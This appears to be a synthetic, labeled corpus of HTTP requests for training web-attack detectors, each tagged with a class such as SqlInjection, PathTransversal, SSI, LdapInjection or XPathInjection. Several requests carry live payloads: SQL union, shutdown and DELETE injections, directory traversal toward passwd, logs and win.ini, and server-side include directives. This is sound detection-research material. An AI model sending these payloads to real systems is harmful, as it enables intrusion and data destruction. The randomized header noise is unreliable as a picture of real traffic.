UA-Pixels: 139x000
Via: 3.0 www.uoxet0.js:4728, 9.8 143.28.202.87
Transfer-Encoding: deflate
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 705 81.237.142.6 "esee7ectnt" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46550
Start - Id: 38940
class: LdapInjection
GET /4toy/x8bodyh.wp-3sam.asp?oUehtd=4U%29%28%26%28objectClass++++%3D++++5e*%29&KUoswhptsibu=taahfbOsdiar&aoamine=tnRiq5eeeiAne HTTP/1.0
Host: www.flse6bqmao.it
Connection: rdobeyy
Accept: video/*, text/html;q=0.5, audio/x-wav
Accept-Charset: *
Accept-Encoding: deflate;q=0.5, identity, identity;q=0.4, compress
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 53.164.177.129
Cookie: @U9rIGot.TZH=t&;gMHNebolr=gbzhU;bhbnm=lvee1e2mhzfst$i;henaE7qlw=05030;tevgaZwfrihua=esupdate;cZ.Er6httpsgFprocessing-instruction=eoawget6psOhseuniont%vbscriptnu>|
Cookie2: $Version="7"
Date: Sat, 12 Nov 05 14:36:23 GMT
ETag: W/"ZzhSlCITX6NTS9bN"
Expect: LdFns
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 16 Jun 08 20:20:33 CET
If-Unmodified-Since: Mon, 18 Jul 05 19:19:19 GMT
If-Match: "_e84BLlSNEdGvmCB"
If-None-Match: *
If-Range: *
Max-Forwards: 994
MIME-Version: 8.7
Pragma: 1ymeE3bt=bngaA
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM YWRXdWhib2V5YXRlc0FwZWllcDZvc0oybnRuQWFBNHJybg==
Range: 19115-,-68,486-99
Referer: http://www.csude.cz/28rmT/dvnO/5teas.mpeg
TE: chunked;q=0.4,trailers
Trailer: From
User-Agent: nTocoirt/4.2.2.7.5
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0621x5666
Via: 0.8 89.150.107.5:36670
Transfer-Encoding: treihe; ttti0=ddIrm
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 059 110.126.4.121 "ei72xe" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38940
Start - Id: 41621
class: SqlInjection
GET /i1QnZ/shaqha2rChi5OFsa/fbhedFel/espp4t4RrRkWY/5-xT2Lc6gln7gTg50T6D/rYhub_nBSSVv/yLDyQvM0oxterm41YJ/eDshdefw.png?nth=720994&h4eeorkErclgco=allRt4t&n87udnbyedo=%27+++%2F**%2F+++OR++++%2F**%2F%27%27++%3D++++%27&aaarfy6rneh5=irwdqhditth8tgnrto&ay3bso=4&so=15042&ece4bc9=82 HTTP/1.1
Host: 209.6.133.15
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: cp-932, windows-1254;q=0.8, x-mac-cyrillic;q=0.5, x-mac-roman, iso-8859-8-i;q=0.2
Accept-Encoding: *
Accept-Language: n6xnrOs-trpt, snfrs-is3n
Cache-Control: max-age=73275
Client-ip: 166.71.235.134
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Thu, 28 Oct 04 02:40:55 UTC
ETag: W/"QJQjrAZViFkDgz2hkW"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Oct 07 04:16:30 UTC
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: *
If-None-Match: "uD5.dA5.g8fBDDRS"
If-Range: Tue, 25 Apr 06 05:14:02 GMT
Max-Forwards: 515
MIME-Version: 3.1
Pragma: 8dj0=tEnheaai
Proxy-Authorization: akeo5s nryIh=hnabaoI
Authorization: NTLM ZVN1NnFuZGx2cmVvNWNoZHRzaXRrZHNxZmVOdGVodGFnbjJlMnNjb3I=
Range: 537-
Referer: http://www.bne5r.fr/sidc/t6r8he/hspnscer/sNesd/cltpnf.shtml
TE: trailers
Trailer: Via
User-Agent: SslE7Srt
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0620x1367
Via: 8.6 www.ledt.tiff:911, HTTP/1.1 45.68.99.130, 6.7 154.32.116.87
Transfer-Encoding: compress
Upgrade: n0A/2.2, tlanud/5.2
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41621
Start - Id: 44745
class: PathTransversal
GET /hB/sl0skm3mscn5t/rrrf/y_val/0T/arbi6hemnneLrae/ea49PvrDhog-VhJRYGx/eodn.nsf?LxF_Gq=dBM&epdznsyIosffgu=anp+e&sik=2981079&3i3dN8t=0400428&Yeleip4t=8&UuUOd=ez&ywmortntetnm=A4etqB&engmgie=c&oedwt2i8Od=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&eAaoeciteud2s=c6m%271 HTTP/1.0
Host: www.ttcqaw.gov:0
Connection: close
Accept: application/*;q=0.7, audio/*, image/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: 3ryTu-e;q=0.6, msl-4k, t-fa;q=0.9, 8rsy-oe9;q=0.0
Cache-Control: min-fresh=4587
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="5"
Date: Fri, 04 Jan 08 11:23:52 GMT
ETag: "pRYdV20JSOUG4g2by2Bw"
Expect: ebctde=i5tn
From: rairnenr@fiohetan.org
If-Modified-Since: Fri, 29 Jul 05 22:39:46 UTC
If-Unmodified-Since: Sat, 06 Dec 08 17:25:50 GMT
If-Match: *
If-None-Match: *
If-Range: "isGqpE53p-LmxJdZ-hE_"
Max-Forwards: 7009
MIME-Version: 4.7
Pragma: dqaeMe='Atorf'
Authorization: ihOi 1ueI=the0
Range: 96-3178
Referer: http://www.ltEr.cz/ti68lods/Aswiome/wraM5/iissz/hrcol5.asmx
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: Mozilla/6.1 (compatible; Konqueror/2.7; WinNT; snyaE72eee; sygapYe6)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: Qya/6.2
Warning: 004 www.hraiWc.shtml:490 "nb9ae9ph" "Wed, 28 Apr 10 17:57:42 GMT"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44745
Start - Id: 42725
class: SqlInjection
PUT /0carsolsmzy9xhmgrem/hMJg@zraKQ2u05MDY9/y0A-nABdvxkaIinputt/gyNjQ8mi_0bH1/Dognltxstntbcn.aspx? HTTP/1.0
Content-Length: 296
Content-Language: Sp,cUseA
Content-Encoding: identity
Content-Location: /wmrohP/c8Yzsby.mdb
Content-MD5: WmQyYWFuZDh0a2hldGhwZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Feb 04 05:40:48 CET
Last-Modified: Tue, 08 Nov 05 06:20:35 UTC
Host: 188.241.150.65:31337
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1250;q=0.7, x-mac-greek
Accept-Encoding: gzip;q=0.6
Accept-Language: *
Cache-Control: oRi9='nb'
Client-ip: 90.28.189.51
Cookie: 6EzNVsge2lX= urfeMhtacceslw
Cookie2: $Version="258"
Date: Mon, 23 Oct 06 19:23:20 GMT
ETag: W/"FP2xdaPt@08NUFp"
If-None-Match: "NBLvneg27-nVwRj"
If-Range: *
Pragma: no-cache
Authorization: joi3 trOcvaas=rdle3
Referer: http://h6Kpeeh.it/dccesiC/nt2hto/e4n9l/mSueon/h2eaaein.mp3
User-Agent: ' union   select     @@version,1,1,1--
UA-CPU: x86
UA-Disp: 0603,672,16
Via: HTTP/0.8 www.hLc4wlE.jpg
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tliketNemQFT=0135223957&Vva6Uv-elg-5=646221797&EeZx-ze8En=j.i-d&fCIv=a%)oient&elx4oh=797352&3dns=Rbeobzeagd2apro&an=ydtr3f9&d7odP=45&Uscript.Awindow.openselectbCPUo=7&seGna=omhnP@&ieN=openaUGipu&Ope=loiLvo h0oa:deleteeoU7stdin&endifhaTrf7ooe=tWcDKyI6ds&duxRbtliiod=25130760&teeloe=ehi6unr

End - Id: 42725
Start - Id: 41478
class: SqlInjection
POST /l5n0Nnmotib/oHtsTe0gsedt1n/titmnlGeyPnk.exe? HTTP/1.0
Content-Length: 150
Content-Language: st3dtlg,ycim8a
Content-Encoding: deflate
Content-Location: /dQaopeey.pl
Content-MD5: cHRpbWNpSWVrblFodDdsaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Sun, 06 Apr 08 16:19:11 GMT
Host: 51.213.142.244
Connection: eBeao
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 141.248.241.47
Cookie: xyre5un=38;poe=4o p&hn:E ;E4ltfiSjne=i
Cookie2: $Version="4"
Date: Fri, 23 Jun 06 21:06:56 CET
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: 100-continue
From: t0cih@nlhtfemb7.st
If-Modified-Since: Sat, 15 Oct 05 22:40:32 GMT
If-Unmodified-Since: Sat, 17 Jan 09 10:45:15 UTC
If-Match: "iGC_BYX0E1ngwljI"
If-None-Match: "AeL@y7tsGmd4QLQO-ywU"
If-Range: Thu, 05 Jul 07 20:39:17 GMT
Max-Forwards: 948
MIME-Version: 4.3
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: NTLM YWUwYWQ5b2hzbXRkczBqc2dpN3RvcnNsMjU2aXNuZWhMbU5hYw==
Range: 78-403185
Referer: /rtotonjl.tiff
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: tyraT/2.8.5.8
UA-CPU: MIPS
UA-Disp: 801,452,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 054x8213
Via: 6.1 www.sEbs.htm
Transfer-Encoding: iiO1y
Upgrade: duea/0.0
Warning: 241 www.cdHIo.gif "n9doishtsina4rYrfe" "Mon, 20 Aug 07 04:06:39 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ZD4j_X=lyn4Dte&rtuRee=updateEposition a&ndPecai7nh=g7.cnj0J_7&saoogjrdcr9l=';    shutdown--&I7lemad=Brf E5opendl=2sams&akiUnaqinkwiTn=ono0rs&a

End - Id: 41478
Start - Id: 45972
class: PathTransversal
PUT /1LvQJ.r/nodeyhU/0ps-wvyvG2KF0/omayhHeiOu/et8iietwenfLtm3h6.js? HTTP/1.1
Content-Length: 27
Content-Language: Da,bgsstcp,npss28ha
Content-Encoding: compress
Content-Location: /1ynctae0/bFufmm/2tb5Aher/fsnr.sh
Content-MD5: ZHBGc3RvYW9vYXlhZTNvZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 11:03:02 GMT
Host: 135.41.184.212
Connection: close
Accept: video/*;q=0.9, image/*
Accept-Charset: *
Accept-Encoding: i:\autoexec.bat
Accept-Language: ete-auwke9, aaad-msnp, wsmnrt-rtya
Cache-Control: idinyoy='Pldt1nc'
Cookie2: $Version="661"
Date: Tue, 05 Sep 06 10:51:18 GMT
ETag: W/"I6Z0ysyfi9upk5OXhCH"
Expect: to84bwb
From: ubSynrd@jJdge.it
If-Match: *
If-None-Match: *
If-Range: Mon, 08 May 06 23:51:59 CET
Max-Forwards: 76
Pragma: o=im
Authorization: Digest qop=auth
Referer: /yr9soith/vswty/reec.wav
TE: trailers,trailers,gzip;q=0.4
Trailer: Authorization
User-Agent: Mozilla/6.8 (compatible; irhmua5rc; Unix; eKol; orsy8htncq; Eetrrrb)
UA-CPU: StrongARM
Via: 4.0 www.3deabstf.css, 6.7 238.230.211.201, 9.5 www.Gotsi.shtml
Transfer-Encoding: gzip
Upgrade: fsoe/9.8, uwtd/5.6, pcsCta/5.2
Warning: 639 www.s0oi.shtml "mlecsk7vago4n8n9set" 
X-Serial-Number: 41893725708385200236
----: ------------------

uGvHD=it &ds0Namnstgia=eLjU

End - Id: 45972
Start - Id: 36280
class: PathTransversal
GET /FohtC9bxrloeega/t6/t8pVv4u43AbZYw/anlIn4evrsrisZ/aAi3/i9Cowt/kjeteeanlnlAl.html?pOHO2v=pea&iW=oN&rseOjD0ede=eO2ExVtk&areakynr=82818&e0ieO=09774&gsi4tjefskloLe=7itnB2eobjectm&hu0WOexecnFg=880388217&deeaacy=%2F%2C%2C%2C%2Fdhthhs%2FlU%2Fpasswd&@pKoh@CY=5227847&cdmydnun=eIm3deletetHpi%3E+cBd&rsHytn=e HTTP/1.0
Host: 179.245.116.96
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: utf-8, iso-8859-2;q=0.7, windows-1253;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 114.100.144.6
Cookie: gnt73qfo=57;l6=s~ :;icplavsdfwsSnT=z34;nlnnoAGCb6bsvwe=T9haunocldEKqo0r68;ekdzevnaLh=Meconnecte;enrXs=546
Cookie2: $Version="13"
Date: Sun, 15 Feb 04 06:36:25 GMT
ETag: W/"9BVqFjumZrGDUWhR"
Expect: eeoeO=e3rsdt9
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Mon, 01 Oct 07 20:33:13 GMT
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: "I_lM8h_X2LcpVp2.CIA"
Max-Forwards: 067
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: nn1f lpedplel=eTmto
Range: 507970-,9199-
Referer: /nisiAmly/iates/hsiR/loG9.mspx
TE: trailers,gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/6.5 (compatible; esobbrade; Unix; tNdjslnt; ifneSsn; polhnait2)
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 1458x3720
Via: 0.7 www.utnH.tiff, FTP/4.7 38.80.154.241
Transfer-Encoding: identity
Upgrade: ye1nNS/5.5
Warning: 581 90.255.148.33 "sluBdaenaa0lrsll" "Sat, 13 May 06 19:24:02 CET"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36280
Start - Id: 39722
class: SSI
GET /iC5XfX1/i.jqN8vs3iNV0LF4o/esMo0iBmfni/nmtacHtIR/l5oeoi5etotrenme/l@xOUMk7UBcA-jx8jt/hWwBQP/m5Aju/6JKPhp-Cg.jpg?AcYXVZ9-=aYeg%5CAiiogtscat&B7P@G=ax9csJmv7&YWoZ-home@-Ez=ah&dlyrTwcc=%3C%21--%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&nLnrwe1tGrSes=8heio&rGiuatca=9a6efee&pxeheo=os.utN9%40DP&nXvrnnmoJsgdeo=nurBb3WCz&U-aa@oqcBeJ=9&esmum=z5E6&usVS=rDpositionxry&ome9=a92zLdk HTTP/1.0
Host: www.zaaiSoi.uk
Connection: keep-alive
Accept: */*
Accept-Charset: utf-8, utf-8, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 55.223.250.116
Cookie: tnc=2;ts5nr9x=128;etr=92789
Cookie2: $Version="27"
Date: Sat, 27 Aug 05 21:00:39 CET
ETag: "S3drG_PYWSBZhlFGgd0W"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Fri, 25 Jul 08 23:35:46 GMT
If-Unmodified-Since: Sun, 21 Jun 09 03:44:38 GMT
If-Match: ".EbmB.K54B80ugH"
If-None-Match: *
If-Range: Sun, 23 Jul 06 14:20:41 CET
Max-Forwards: 2811
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: uoao sivueirq=ctprthen
Range: 02-82069,-940191,6-9
Referer: http://esot.be/iJ6e.jsp
TE: trailers,gzip,chunked;q=0.3
Trailer: Host
User-Agent: p_.yHDNCmQ http://www.iaw29.net
UA-CPU: x86
UA-Disp: 3264,053,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 066x3039
Via: htcial/8.9 www.womjiISd.js, HTTP/4.2 www.eheex.jpeg
Transfer-Encoding: reheys
Upgrade: eoe/8.5, rhosn/0.5, slnwao/7.8
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39722
Start - Id: 37883
class: LdapInjection
GET /eU5SxI2eXx1xYmfq/js/aiwa7seo/.MNF.LlE_/diueneTedtwd/am_@iF-OyBjoZ.xfJ/otYk@/lP9vAzAGslGsgw@hZb_/qwoupiiohGenmoeh.js?ie=laitvMisystem&bgsoundJMra0_7=replacem+3leseir4iisrm%3Aibodyea&@Y2TRM2Teeval=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&VNwihposnTeted=comochaa%3D%3Dlloe72OAvh&BMdWuUcQZP=6319 HTTP/1.1
Host: www.eFt6mbhni2.ch:80
Connection: eHtu3
Accept: audio/*;q=0.5, video/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 172.248.95.29
Cookie: jTe2aw=dFLCZVZ3-
Cookie2: $Version="4"
Date: Tue, 16 Aug 05 17:24:18 CET
ETag: W/"f6rJoig5_jWofff_Gc"
Expect: ooauyOdi
From: ftCe@ttlwnsel.it
If-Modified-Since: Sun, 19 Feb 06 18:38:45 GMT
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Digest nc=28CB3d4D
Range: 41-534098,-55
Referer: /tblhl/sels9f/Htjih/IywygSwt.cgi
TE: chunked;q=0.7,gzip,gzip;q=0.3
Trailer: If-Modified-Since
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 6.8; rr-us; rv:5.8.7) Gecko/05419868
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/7.7 www.n44w.png:133
Transfer-Encoding: compress
Upgrade: 82r/8.3, ehi/8.7
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37883
Start - Id: 49449
class: XPathInjection
GET /tMFdJT/cpbs-lB.tA/t4E-LBJ42cH0fRfC@0p/disT0Schildpassthru.html?eroerftsrc6=ooVsTFQ&6C8w=ntravbs%27++++or++1%3C+++gal%2Fa%2Fo7nl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D+++++or++%27Tetbs%27++++%3D++++%27&sctambA3Ohosnr6=a%7CBAsconnectnen%26u HTTP/1.1
Host: www.mhme.uk
Connection: keep-alive
Accept: video/*;q=0.9, application/postscript;q=0.3
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: tihgtr-utEU;q=0.6, t7hu-n6yon, aiaffudg-rgtra;q=0.3, e-eted6E;q=0.0
Cache-Control: snL=iute6
Client-ip: 111.175.169.32
Cookie: connectRMQdZinputOI6mn=selectafroma =/urestconnectn ruoeval;n.EWG9f=insert l);hbotstohgbesing=t1.8ueswCb@;ouv=iptzC;71g=3504;se8eetnenlisMdn=uesyGhTo
Cookie2: $Version="260"
Date: Sat, 21 Jun 08 15:11:16 GMT
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: zaaoof=ntntvtyD
From: n5thibdN@srSdAet.st
If-Modified-Since: Tue, 08 Aug 06 02:05:33 CET
If-Unmodified-Since: Fri, 10 Mar 06 15:39:43 UTC
If-Match: "GcEp3ypmu@-2ZUfMk"
If-None-Match: *
If-Range: "PQ3v0dUE9KM_XWre8Z"
Max-Forwards: 496
MIME-Version: 3.2
Pragma: m=gelnEeb
Proxy-Authorization: Jundcr iervTn=RhAbnay
Authorization: euxti3 otex=igme
Range: 894764-6
Referer: http://www.alUud.cz/waemdaoe/nhre/ln2eac/a6ce8/stesnsut.tar
TE: gzip;q=0.2,trailers
Trailer: Accept-Charset
User-Agent: orjonstitr
UA-CPU: Sparc
UA-Disp: 247,139,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 950x8575
Via: 7.8 150.62.227.45
Transfer-Encoding: identity
Upgrade: 4wre/8.6, sckoiq/7.6
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49449
Start - Id: 46179
class: PathTransversal
GET /tEgm_57wDaX9/nPU5/fQ.qpasswdhVq_/inV48r5QlZ1/tgkAg9a15/aslr9leRwaAoAbms/9fz0AaXqN_7EI.asmx?4avf853u=d%25i&dnrdbepbtasdo=tgiWCqm5e&nhte6ewtr4e=A&passthruAmCAXWS=7935891748&vi7sinn1Aimnt=0922&onx4oamAnaruob=esb2Eg4&umeaoecuhnse=55152&ohSaEroiYsciU=470898106&sxCtba=ffidhqpoaolb&P2KP4vtQXy=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&irTjdojo67=nN%40VnvbTs8&O4t8CeXmGx=768111&jI0a..havingUYrd=a7A&cstxizanSdao=ha HTTP/1.0
Host: www.eede.biz
Connection: dbahye
Accept: text/*
Accept-Charset: euc-cn, cp-936;q=0.9, cp-936;q=0.2, x-mac-roman, iso-10646-ucs-2;q=0.7
Accept-Encoding: compress;q=0.2, compress;q=0.8, gzip;q=0.6
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Wed, 24 Aug 05 13:44:04 CET
ETag: W/"zHp6z1-Anyy.MLyB2IMg"
Expect: cedee3w=dlwMc;pae5ufla=teioH
From: duvqw@ecyw.st
If-Modified-Since: Thu, 14 Dec 06 06:48:11 GMT
If-Unmodified-Since: Thu, 02 Dec 04 20:45:57 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Mar 09 02:41:46 CET
Max-Forwards: 788
MIME-Version: 6.1
Pragma: jh1=jkrmell
Proxy-Authorization: 9esi xlsrt=e623
Authorization: Digest response="a9e5F10D9dffdBcbdAD1c7071a9ff3dA"
Range: -423
Referer: http://uet2ir.biz/goxxdnw/roer.php4
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.0 (Windows; U; WinNT 8.5; mo-cr; rv:1.2.4) Gecko/72501541
UA-CPU: x86
UA-Disp: 3301,4753,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/0.8 58.123.140.202, 2.9 www.erubl.html
Transfer-Encoding: compress
Upgrade: amiap/9.1
Warning: 292 www.tdsirTm.jpg "oohoctsorndn" "Tue, 29 Dec 09 06:05:50 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: -------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46179
Start - Id: 40366
class: SSI
GET /oyLjRnC5hXiChMJ2t/ey1W04yyF/iatqemoAtebcAspa/njI/uetOmt/s37wV7gBKeEKfGP5H2U.jpeg? HTTP/1.0
Host: 75.176.120.30
Connection: close
Accept: video/*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: <!--    #include     virtual="d:\windows\autoexec.bat"     -->
Accept-Language: espn-oe
Cache-Control: max-stale
Client-ip: 99.139.161.176
Cookie: fimHezhtrehu=e7h;hopt65UBfzEid=409265;sAa=s69ksGh'osa
Cookie2: $Version="67"
Date: Mon, 27 Nov 06 12:02:35 CET
ETag: W/"4dnAeROrB54vPLS"
Expect: nRhaokrh
If-Modified-Since: Thu, 07 Sep 06 12:27:05 UTC
If-Unmodified-Since: Sun, 07 Aug 05 12:06:22 CET
If-Match: "qNfplCPrTBYdmDL-o8"
If-None-Match: "tYQWUUG8-ZgvhNlg2"
If-Range: "xv5ccaXIX1zi95Ay"
Max-Forwards: 3943
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: otTs yhrh=ttNen4D
Authorization: Digest uri=/pwa0.cfm
Referer: http://www.oltoat.fr/mibfcRM/eHeitti/isaem/ernnhy.mdb
TE: trailers
Trailer: Via
User-Agent: rotoc9awaaeu
UA-Disp: 620,9382,32
UA-OS: FreeBSD
UA-Color: color16
Via: HTTP/2.8 www.5hte.shtml, 0.2 www.c3eesIds.css
Transfer-Encoding: identity
Upgrade: mN1s/5.6
----: --------------------------------------------

null

End - Id: 40366
Start - Id: 42458
class: SqlInjection
GET /cii/bnoaodb6urd/senS1n/lds/rti5eexaOYe0nt/etiNoh8x/acceptDQx4systemMQKaF6/eEod.Z5sqUt9XBp@-r/iknriWhkh.jpeg?dutiq2=%40gvoithopenessi0%3C&ed1c9=ti&sDiDhlmt5tnz=601&osl=478&epe=4&dNml=ehx&Arise52ncme=cuwnf&Ti=arbsora%27+%29%3B+++DEL%2F**%2FETE+++++FROM++++users+WHERE+++upper%28username%29+++++%3D+upper%28++%27admin&aoecsgd=8233&cust=fsegts15uEormwycfn&glE2raiaaee=3IH HTTP/1.1
Host: www.tesRodoan.uk:80
Connection: 6M0qei
Accept: */*
Accept-Charset: iso-8859-3, x-mac-icelandic, iso-8859-5, x-mac-turkish;q=0.2, cp-932
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=1209
Client-ip: 13.69.56.93
Cookie: 5rfeqtE=aooopeea 8de q;iipbntonnxelez=fsock_streama;nrmejHsmh3kRlDm=ipasswdCscat;mi8en=)deoeqxp_<ngjFtrC
Cookie2: $Version="3"
Date: Wed, 11 Jun 08 05:09:18 CET
ETag: "qpEgOLwaqcuuIaJS0f8"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Sun, 19 Sep 04 03:50:54 CET
If-Unmodified-Since: Sat, 04 Nov 06 19:57:21 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Aug 09 16:02:54 UTC
Max-Forwards: 57
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic c2dtYTpzTmtOdHNw
Authorization: Basic ZmU2b3NpZW46bmJwdDdlMw==
Range: -9
Referer: http://rhri09.org/1dd2/aihfg/noeetha1/ca8b.msf
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.8 (Machintosh; U; PPC Mac OS X 8.6; aX-ec; rv:4.2.0) Gecko/81618787
UA-CPU: 68000
UA-Disp: 3357,1870,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: sfet/4.5 www.eLOhsoj.gif
Transfer-Encoding: compress
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 574567754776356
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42458
Start - Id: 45773
class: PathTransversal
GET /L_@yVDeBwXpassthrupwJ/sjs1naely3usssilmT1/HBqCVX/lPE8fPyA1V2@zvrW/S7RBmailsNsBf/pH@Ruf45yOLO/i@i/r8R0X16rs4r0YnjG9A/i8W1QlCOB/iSwLINyZCaXFYR.png?nzar=rwXTK7jL3vp&otieeam0mW5=213252&aEse3AnRs=48904450&yaye=0060&pplx8n=le&gzeg8s=6%3A%5C%5CWINNT%5C%5Cwin.ini HTTP/1.0
Host: 221.232.17.7:80
Connection: wmu3
Accept: application/rtf
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: jnerh-t, q-rndo;q=0.5, ae3a3e-fen3, rm0n3-fhc
Cache-Control: nls=tgoeE
Client-ip: 229.242.26.88
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Tue, 15 Nov 05 05:52:49 CET
ETag: "o-Sve-wo4yNnUq.x7"
